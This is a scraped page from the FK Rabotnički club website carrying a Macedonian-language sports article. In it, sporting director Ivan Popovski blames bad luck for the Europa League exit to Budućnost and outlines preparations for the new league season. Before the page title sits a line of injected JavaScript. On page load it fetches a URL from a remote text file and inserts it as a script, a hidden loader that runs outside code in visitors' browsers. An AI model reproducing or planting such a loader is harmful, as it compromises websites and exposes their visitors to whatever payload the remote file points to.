;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Иван Поповски: Фортуната ова европско лето не беше со нас
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Иван Поповски: Фортуната ова европско лето не беше со нас

Работнички доживеа елиминација од Будуќност во првото квалификациско коло од Лигата на Европа и, за жал, не го повтори долгото европско фудбалско лето од минатата сезона. Овојпат тимот предводен од Томислав Франц не успеа да ја мине првата пречка, иако, се чини, во ниту еден момент фудбалски не беше во инфериорна положба во однос на црногорскиот претставник. Но, за да се помине европска пречка, понекогаш е потребно да те послужи и среќата.

„Не се надевавме дека европското лето ќе трае толку кусо. Во ниту еден сегмент не бевме послаби од Будуќност, но, ете, на крајот Црногорците се радуваа на пласман во следната рунда од квалификациите во Лигата на Европа. Ако се навратам на минатото лето, и дуелите со Трабзон, со Рубин Казан, тогаш сета онаа среќа што ја имавме на тие мечеви против посилните ривали, сега како да се сврте против нас. Примивме гол во Скопје иако противникот не создаде ниту една шанса, а на реваншот во Подгорица бевме поразени со гол од пенал, и повеќе од 70 минути игравме со играч помалку. Сите овие ’несреќни’ моменти покажуваат дека фортуната не беше ова лето со нас, иако е јасно дека сме поквалитетен тим од Будуќност“, анализира спортскиот директор, Иван Поповски.

rabotnicki trening pred buducnost 9

По мала пауза, Работнички од денеска повторно е во погон и ги продолжува подготовките за почетокот на новата натпреварувачка сезона во Првата лига. Раководството ќе се фокусира да доведе уште некое засилување во тимот, а фудбалерите и стручниот штаб што е можно подобро да се подготват за првенствените искушенија во новиот шампионат.

„Од денеска се фокусираме на новата сезона во Македонија. Ќе се потрудиме да доведеме уште некое засилување, пред се во навалната линија со оглед на заминувањето на Алтипармаковски, а сакаме да ги задржиме и фудбалерите на кои им истекуваат договорите. Во план се и две пријателски средби за одржување и подобрување на натпреварувачката форма, но допрва ќе треба да ги конкретизираме сите тие активности“, посочува Иван Поповски.

Од тимот на Работнички си заминува хрватскиот интернационалец Марко Пушкариќ, кој не беше регистриран ниту за натпреварите против Будуќност во квалификациите за Лигата на Европа.

Leave a Reply